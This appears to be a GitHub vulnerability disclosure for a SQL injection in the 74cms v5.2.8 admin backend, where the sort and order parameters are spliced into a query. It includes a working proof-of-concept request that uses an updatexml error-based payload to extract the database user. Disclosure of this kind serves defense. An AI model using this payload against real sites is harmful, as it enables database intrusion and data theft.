Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
43 lines (28 sloc) 1.47 KB

74cms v5.2.8 SQLI

Detail

The vulnerability is generated by the _list method in the Common/Controller/BackendController.class.php file, using the I() in the _list method to receive the sort and order parameters, and the splicing assignment to $order_by.

$order_by enters the SQL query by splicing, resulting in SQL injection.

The _list method is called in the index method.

Taking Admin/Controller/AdController.class.php as an example, the AdController class inherits the BackendController class and calls index() in the category method.

PoC

Log in to the administrator account and send the following request packet.

GET /74cms/upload/index.php?m=Admin&c=Ad&a=category&sort=1&order=and+updatexml(0,concat(0x7e,user()),0) HTTP/1.1
Host: [::]
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://[::]/74cms/upload/index.php?m=Admin&c=index&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: XDEBUG_SESSION=PHPSTORM; think_template=default; PHPSESSID=4gibptgp8kflrc0f9sd2t8pfm0; think_language=zh-CN
Connection: close

success

You can’t perform that action at this time.